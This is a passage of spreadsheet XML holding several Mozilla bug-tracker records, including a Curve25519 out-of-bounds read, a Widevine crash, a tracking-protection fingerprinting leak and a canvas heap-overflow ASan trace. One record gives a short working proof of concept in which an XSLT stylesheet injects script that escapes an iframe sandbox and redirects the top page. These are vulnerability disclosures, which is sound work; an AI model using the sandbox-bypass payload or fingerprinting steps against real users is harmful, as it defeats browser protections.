Notice that `ec_Curve25519_mul` assumes that the input secret `s` is 32 bytes long:
  https://searchfox.org/mozilla-central/source/security/nss/lib/freebl/ecl/curve25519_32.c#370
If the leading zeros have been truncated, then `s` is &lt; 32 bytes and we will have an OOB read. In addition, the operation returns an incorrect answer.
Expected results:
OPTION 1: The `CKA_VALUE` parameter for Curve25519 keys should not have their leading 0x00 bytes stripped in when importing:
  https://searchfox.org/mozilla-central/source/security/nss/lib/pk11wrap/pk11pk12.c#513
There should be an assertion somewhere in this code to check that the `CKA_VALUE` string is exactly 32 bytes long when the key represents a Curve25519 public key.
(I haven't tested it, but I suspect that the `CKA_EC_POINT` parameter shouldn't have it's leading 0x00 bytes stripped either.)
OPTION 2: In `ec_Curve25519_mul`, rewrite the code to handle the case when the secret key `s` has length &lt; 32 bytes. In particular, the mul code could add leading 0x00 bytes to pad the secret key up to 32 bytes.</t>
        </is>
      </c>
      <c r="X1261" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" t="n">
        <v>1729517</v>
      </c>
      <c r="B1262" t="inlineStr">
        <is>
          <t>2021-09-07 10:45:28 -0700</t>
        </is>
      </c>
      <c r="C1262" t="inlineStr">
        <is>
          <t>Script via XSLT stylesheet bypasses &lt;iframe sandbox&gt; attribute restrictions</t>
        </is>
      </c>
      <c r="D1262" t="inlineStr">
        <is>
          <t>2024-05-30 10:36:21 -0700</t>
        </is>
      </c>
      <c r="E1262" t="n">
        <v>1</v>
      </c>
      <c r="F1262" t="n">
        <v>1</v>
      </c>
      <c r="G1262" t="n">
        <v>3</v>
      </c>
      <c r="H1262" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1262" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1262" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K1262" t="inlineStr">
        <is>
          <t>Firefox 93</t>
        </is>
      </c>
      <c r="L1262" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1262" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1262" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1262" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1262" t="inlineStr">
        <is>
          <t>[sec-survey][adv-main94+][adv-esr91.3+]</t>
        </is>
      </c>
      <c r="Q1262" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1262" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1262" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T1262" t="n">
        <v>1</v>
      </c>
      <c r="U1262" t="n">
        <v>0</v>
      </c>
      <c r="V1262" t="n">
        <v>23</v>
      </c>
      <c r="W1262" t="inlineStr">
        <is>
          <t>Created attachment 9239890
iframe-sandbox-xsl-demo-selfcontained.html
The security restrictions applied via an `&lt;iframe&gt;`'s `sandbox` attribute can be bypassed by injecting scripts through XSLT stylesheets.
### Description
A blank `sandbox` attribute adds several restrictions to the content of an `&lt;iframe&gt;`, such as blocking script execution and top-level navigation. However, those restrictions are not applied correctly to an XML content document which is transformed by an XSLT stylesheet. If a sheet's transformation directives create a new  XHTML `&lt;script&gt;` tag, the `sandbox` rules don't take effect. That is, the script code executes normally and it may create pop-ups or issue top-level redirects (`top.location = ...`).
### Proof of concept
The proof-of-concept embeds an XML document via `&lt;iframe sandbox src="..."&gt;`. The XML doc then references an XSLT stylesheet via `&lt;?xml-stylesheet type="text/xsl" href="..."&gt;` which applies an `&lt;xsl:template&gt;` containing a `&lt;script&gt;` with the payload to execute.
Attached is a self-contained PoC. It uses `data:`-URIs for convenience, but the resources may as well be in different files (and on different hosts), e.g.:
`parent.html`:
    &lt;iframe sandbox src='child.xml'&gt;&lt;/iframe&gt;
`child.xml`:
    &lt;?xml-stylesheet type="text/xsl" href="sheet.xsl"?&gt;
    &lt;root/&gt;
`sheet.xsl`: (must send permissive `Access-Control-Allow-Origin` to load!)
    &lt;stylesheet version="1.0" xmlns="http://www.w3.org/1999/XSL/Transform"&gt;
        &lt;template match="/"&gt;
            &lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;
                prompt(location.href);
                top.location = `http://example.com/`;
            &lt;/script&gt;
        &lt;/template&gt;
    &lt;/stylesheet&gt;
NB: To be clear, the bug *only* defeats the `sandbox` attribute, but not the default SOP boundary between cross-origin frames.</t>
        </is>
      </c>
      <c r="X1262" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1263">
      <c r="A1263" t="n">
        <v>1270607</v>
      </c>
      <c r="B1263" t="inlineStr">
        <is>
          <t>2016-05-05 12:34:35 -0700</t>
        </is>
      </c>
      <c r="C1263" t="inlineStr">
        <is>
          <t>Widevine crash in mozilla::SamplesWaitingForKey::WaitIfKeyNotUsable when using DASH.js player or Amazon</t>
        </is>
      </c>
      <c r="D1263" t="inlineStr">
        <is>
          <t>2016-05-13 17:17:08 -0700</t>
        </is>
      </c>
      <c r="E1263" t="n">
        <v>1</v>
      </c>
      <c r="F1263" t="n">
        <v>1</v>
      </c>
      <c r="G1263" t="n">
        <v>3</v>
      </c>
      <c r="H1263" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1263" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1263" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K1263" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1263" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1263" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1263" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1263" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1263" t="inlineStr"/>
      <c r="Q1263" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1263" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1263" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T1263" t="n">
        <v>1</v>
      </c>
      <c r="U1263" t="n">
        <v>0</v>
      </c>
      <c r="V1263" t="n">
        <v>21</v>
      </c>
      <c r="W1263" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-21904d1c-73aa-4ceb-b8f0-38dd82160505.
=============================================================
I hit this crash once when trying to repro DASH.js crash bug 1268694, but there are 15 crash reports. 13 are from Amazon, 1 from imdb.com, and my DASH.js crash.
Curiously, of the 13 Amazon crash reports: 8 are from amazon.de, 3 from amazon.co.uk, and only 1 is from amazon.com. They don't appear to be the same users because each crash report has a different Firefox install time. Is there something different about Amazon's video player outside the US? I don't think this is an artifact of crash report processing for easterly time zones because most of the crash reports are many days old.
List of crash reports including URLs and install times:
https://is.gd/SefnKs
0 	XUL 	mozilla::SamplesWaitingForKey::WaitIfKeyNotUsable(mozilla::MediaRawData*) 	mfbt/RefPtr.h:261
1 	XUL 	mozilla::EMEDecryptor::Input(mozilla::MediaRawData*) 	dom/media/platforms/agnostic/eme/EMEDecoderModule.cpp:48
2 	XUL 	nsRunnableMethodImpl&lt;nsresult (mozilla::MediaDataDecoder::*)(mozilla::MediaRawData*), true, RefPtr&lt;mozilla::MediaRawData&gt; &gt;::Run 	xpcom/glue/nsThreadUtils.h:676
3 	XUL 	mozilla::TaskQueue::Runner::Run() 	xpcom/threads/TaskQueue.cpp:170
4 	XUL 	nsThreadPool::Run() 	xpcom/threads/nsThreadPool.cpp:227
5 	XUL 	non-virtual thunk to nsThreadPool::Run() 	xpcom/threads/nsThreadPool.cpp:154
6 	XUL 	nsThread::ProcessNextEvent(bool, bool*) 	xpcom/threads/nsThread.cpp:994
7 	XUL 	NS_ProcessNextEvent(nsIThread*, bool) 	xpcom/glue/nsThreadUtils.cpp:297
8 	XUL 	mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:355
9 	XUL 	MessageLoop::Run() 	ipc/chromium/src/base/message_loop.cc:234
10 	XUL 	nsThread::ThreadFunc(void*) 	xpcom/threads/nsThread.cpp:396
11 	libnss3.dylib 	_pt_root 	nsprpub/pr/src/pthreads/ptthread.c:216</t>
        </is>
      </c>
      <c r="X1263" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1264">
      <c r="A1264" t="n">
        <v>1748503</v>
      </c>
      <c r="B1264" t="inlineStr">
        <is>
          <t>2022-01-04 12:19:27 -0800</t>
        </is>
      </c>
      <c r="C1264" t="inlineStr">
        <is>
          <t>Detecting whether a URL is blocked (by Tracking Protection or an extension) or not through importScripts</t>
        </is>
      </c>
      <c r="D1264" t="inlineStr">
        <is>
          <t>2024-06-04 12:05:50 -0700</t>
        </is>
      </c>
      <c r="E1264" t="n">
        <v>1</v>
      </c>
      <c r="F1264" t="n">
        <v>1</v>
      </c>
      <c r="G1264" t="n">
        <v>3</v>
      </c>
      <c r="H1264" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1264" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1264" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K1264" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1264" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1264" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1264" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1264" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1264" t="inlineStr">
        <is>
          <t>[keep hidden until bug 1740985 is public][fingerprinting][post-critsmash-triage][adv-main97-][adv-esr91.6-]</t>
        </is>
      </c>
      <c r="Q1264" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1264" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1264" t="inlineStr">
        <is>
          <t>98 Branch</t>
        </is>
      </c>
      <c r="T1264" t="n">
        <v>1</v>
      </c>
      <c r="U1264" t="n">
        <v>0</v>
      </c>
      <c r="V1264" t="n">
        <v>15</v>
      </c>
      <c r="W1264" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1740985 +++
The original testcase of bug 1740985 (attachment 9250556) is fixed WRT the original XSLeak of determining the difference between script and non-script files. Now both return the same error, as well as non-existing files. But it still can be used to potentially fingerprint the user: if a file load is blocked entirely by tracking protection or an extention (e.g. uBlock Origin) then that case can be distinguished.
STR:
1. Enable "Strict" tracking protection in prefs, or install uBlock Origin
2. Open attachment 9250556 and try to load the default google-analytics URL
3. compare to trying to load something that exists (https://www.mozilla.org/favicon.ico) or trying to load that same URL with tracking protection disabled.
This error loading difference is probably not restricted to just worker files. I'm not sure how important a fingerprinting vector this is -- there are probably more direct ways to check whether tracking protection is enabled, or which of several standard ad-blocker lists are enabled.</t>
        </is>
      </c>
      <c r="X1264" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" t="n">
        <v>144562</v>
      </c>
      <c r="B1265" t="inlineStr">
        <is>
          <t>2002-05-14 14:04:21 -0700</t>
        </is>
      </c>
      <c r="C1265" t="inlineStr">
        <is>
          <t>Need a way to pre-configure email/news account setup</t>
        </is>
      </c>
      <c r="D1265" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E1265" t="n">
        <v>1</v>
      </c>
      <c r="F1265" t="n">
        <v>1</v>
      </c>
      <c r="G1265" t="n">
        <v>2</v>
      </c>
      <c r="H1265" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1265" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1265" t="inlineStr">
        <is>
          <t>MailNews: Account Configuration</t>
        </is>
      </c>
      <c r="K1265" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1265" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1265" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1265" t="inlineStr">
        <is>
          <t>[adt1 rtm],custrtm+ [ETA 06/20]</t>
        </is>
      </c>
      <c r="Q1265" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1265" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1265" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T1265" t="n">
        <v>1</v>
      </c>
      <c r="U1265" t="n">
        <v>0</v>
      </c>
      <c r="V1265" t="n">
        <v>42</v>
      </c>
      <c r="W1265" t="inlineStr">
        <is>
          <t>Requirements 
General requirements
  o pre-configurate and lock server preferences before deploying them.
  o the ability to designate which account/server is the default for email or
    news separately.
  o when a preference is locked, the associated UI in the client should be
    disabled/greyed out.
  o end users should not be able to modify/delete pre-configure settings
  o the solution should work with both new profiles and existing profiles 
    which might have server settings already.
  o there should be preference of whether users are allowed to add new mail/news 
    account. 
  o how do we handle pre-existing server settings in old profiles
    - leave them alone (end users still can use them) but use new server 
      setting as the defaults. 
    - when locked, users won't be allowed to switch the default server.
  o users will get prompted to enter user information (account name, identity,
    etc.) if such information is not available in the user profile.</t>
        </is>
      </c>
      <c r="X1265" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1266">
      <c r="A1266" t="n">
        <v>1170706</v>
      </c>
      <c r="B1266" t="inlineStr">
        <is>
          <t>2015-06-02 12:09:57 -0700</t>
        </is>
      </c>
      <c r="C1266" t="inlineStr">
        <is>
          <t>Remove the ReadMe-UI</t>
        </is>
      </c>
      <c r="D1266" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E1266" t="n">
        <v>1</v>
      </c>
      <c r="F1266" t="n">
        <v>1</v>
      </c>
      <c r="G1266" t="n">
        <v>7</v>
      </c>
      <c r="H1266" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1266" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1266" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1266" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1266" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1266" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1266" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1266" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1266" t="inlineStr"/>
      <c r="Q1266" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1266" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1266" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1266" t="n">
        <v>1</v>
      </c>
      <c r="U1266" t="n">
        <v>0</v>
      </c>
      <c r="V1266" t="n">
        <v>6</v>
      </c>
      <c r="W1266" t="inlineStr">
        <is>
          <t>As far as I can tell everything in our README-UI.md in the repo is present off the main README.md readthedocs link. So I think we can remove -UI to prevent possible confusion, and have a single path to doc discovery.</t>
        </is>
      </c>
      <c r="X1266" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1267">
      <c r="A1267" t="n">
        <v>1170390</v>
      </c>
      <c r="B1267" t="inlineStr">
        <is>
          <t>2015-06-01 17:50:23 -0700</t>
        </is>
      </c>
      <c r="C1267" t="inlineStr">
        <is>
          <t>AddressSanitizer READ of size 1364 gfx/2d/DataSurfaceHelpers.cpp:81</t>
        </is>
      </c>
      <c r="D1267" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:50 -0700</t>
        </is>
      </c>
      <c r="E1267" t="n">
        <v>1</v>
      </c>
      <c r="F1267" t="n">
        <v>1</v>
      </c>
      <c r="G1267" t="n">
        <v>3</v>
      </c>
      <c r="H1267" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1267" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1267" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K1267" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L1267" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1267" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1267" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1267" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1267" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][gfx-noted][adv-main41+] sec-high when using  Cairo xlib 16-bit</t>
        </is>
      </c>
      <c r="Q1267" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1267" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1267" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T1267" t="n">
        <v>1</v>
      </c>
      <c r="U1267" t="n">
        <v>0</v>
      </c>
      <c r="V1267" t="n">
        <v>66</v>
      </c>
      <c r="W1267" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Steps to reproduce:
Version: firefox-41.0a1.en-US.linux-x86_64-asan (latest Mozilla ASAN build)
OS: Ubuntu 15.04
Actual results:
  =================================================================
==25926==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f9b380986a7 at pc 0x7f9b5a205a94 bp 0x7fffa3c79bb0 sp 0x7fffa3c79ba8
READ of size 1364 at 0x7f9b380986a7 thread T0 (Web Content)
    #0 0x7f9b5a205a93 in mozilla::gfx::CopySurfaceDataToPackedArray(unsigned char*, unsigned char*, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, int, int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/gfx/2d/DataSurfaceHelpers.cpp:81
    #1 0x7f9b5a205cf3 in mozilla::gfx::SurfaceToPackedBGRA(mozilla::gfx::DataSourceSurface*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/gfx/2d/DataSurfaceHelpers.cpp:132
    #2 0x7f9b5be43519 in mozilla::dom::CanvasRenderingContext2D::GetImageBuffer(unsigned char**, int*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:1597
    #3 0x7f9b5c104cee in mozilla::dom::HTMLCanvasElement::ToBlob(JSContext*, mozilla::dom::FileCallback&amp;, nsAString_internal const&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/html/HTMLCanvasElement.cpp:594
    #4 0x7f9b5bb7f32b in mozilla::dom::HTMLCanvasElementBinding::toBlob(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLCanvasElement*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/bindings/./HTMLCanvasElementBinding.cpp:345
    #5 0x7f9b5bdbeb56 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/bindings/BindingUtils.cpp:2609
    #6 0x7f9b5f7f8ff2 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jscntxtinlines.h:235
    #7 0x7f9b5f7bbe82 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:720:16
    #8 0x7f9b5f7eac5e in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:2961
    #9 0x7f9b5f7d7fcb in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #10 0x7f9b5f7bbfe5 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:747
    #11 0x7f9b5f785ae4 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:784
    #12 0x7f9b600720a2 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4392
    #13 0x7f9b5a788456 in nsFrameMessageManager::ReceiveMessage(nsISupports*, nsIFrameLoader*, bool, nsAString_internal const&amp;, bool, mozilla::dom::StructuredCloneData const*, mozilla::jsipc::CpowHolder*, nsIPrincipal*, nsTArray&lt;mozilla::OwningSerializedStructuredCloneBuffer&gt;*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/base/nsFrameMessageManager.cpp:1253
    #14 0x7f9b5a7873cc in nsFrameMessageManager::ReceiveMessage(nsISupports*, nsIFrameLoader*, nsAString_internal const&amp;, bool, mozilla::dom::StructuredCloneData const*, mozilla::jsipc::CpowHolder*, nsIPrincipal*, nsTArray&lt;mozilla::OwningSerializedStructuredCloneBuffer&gt;*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/base/nsFrameMessageManager.cpp:1070
    #15 0x7f9b5caa5ead in mozilla::dom::TabChild::RecvAsyncMessage(nsString const&amp;, mozilla::dom::ClonedMessageData const&amp;, nsTArray&lt;mozilla::jsipc::CpowEntry&gt;&amp;&amp;, IPC::Principal const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/ipc/TabChild.cpp:2738
    #16 0x7f9b5caa5f4f in non-virtual thunk to mozilla::dom::TabChild::RecvAsyncMessage(nsString const&amp;, mozilla::dom::ClonedMessageData const&amp;, nsTArray&lt;mozilla::jsipc::CpowEntry&gt;&amp;&amp;, IPC::Principal const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/ipc/Unified_cpp_dom_ipc0.cpp:2742
    #17 0x7f9b599d6971 in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/ipc/ipdl/./PBrowserChild.cpp:2547
    #18 0x7f9b59ad4f7a in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/ipc/ipdl/./PContentChild.cpp:5316
    #19 0x7f9b595965a0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessageChannel.cpp:1279
    #20 0x7f9b59594e63 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessageChannel.cpp:1198
    #21 0x7f9b5958c63c in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessageChannel.cpp:1182
    #22 0x7f9b59513661 in MessageLoop::RunTask(Task*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:361
    #23 0x7f9b595140df in MessageLoop::DeferOrRunPendingTask(MessageLoop::PendingTask const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:369
    #24 0x7f9b595146ba in MessageLoop::DoWork() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:456
    #25 0x7f9b5959c237 in mozilla::ipc::DoWorkRunnable::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessagePump.cpp:220
    #26 0x7f9b58dc392a in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/xpcom/threads/nsThread.cpp:846
    #27 0x7f9b58e424de in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #28 0x7f9b5959b8bc in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessagePump.cpp:127
    #29 0x7f9b5959c680 in mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessagePump.cpp:289
    #30 0x7f9b59513321 in MessageLoop::RunInternal() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #31 0x7f9b595131c8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #32 0x7f9b5cea8566 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/widget/nsBaseAppShell.cpp:165
    #33 0x7f9b5e4956a6 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:745
    #34 0x7f9b5959c518 in mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/glue/MessagePump.cpp:259
    #35 0x7f9b59513321 in MessageLoop::RunInternal() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #36 0x7f9b595131c8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #37 0x7f9b5e494a90 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:581
    #38 0x49c779 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:236
    #39 0x7f9b55dc8a3f in __libc_start_main /build/buildd/glibc-2.21/csu/libc-start.c:289
    #40 0x49ba3c in _start (/home/revskills/Browsers/firefox/plugin-container+0x49ba3c)
0x7f9b380986a7 is located 679 bytes to the right of 175104-byte region [0x7f9b3806d800,0x7f9b38098400)
allocated by thread T0 (Web Content) here:
    #0 0x484588 in __interceptor_posix_memalign /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:132
    #1 0x7f9b5a5f1855 in TryAllocAlignedBytes(unsigned long) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/gfx/thebes/gfxImageSurface.cpp:92
    #2 0x7f9b5a5f1425 in gfxImageSurface::AllocateAndInit(long, int, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/gfx/thebes/gfxImageSurface.cpp:129
    #3 0x7f9b5a57b0ff in gfxPlatformGtk::CreateOffscreenSurface(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, gfxContentType) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/gfx/thebes/gfxPlatformGtk.cpp:140
    #4 0x7f9b5a5738d0 in gfxPlatform::CreateDrawTargetForBackend(mozilla::gfx::BackendType, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/gfx/thebes/gfxPlatform.cpp:1217
    #5 0x7f9b5a573b45 in gfxPlatform::CreateOffscreenCanvasDrawTarget(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/gfx/thebes/gfxPlatform.cpp:1233
    #6 0x7f9b5a367008 in mozilla::layers::LayerManager::CreateDrawTarget(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/gfx/layers/Layers.cpp:158
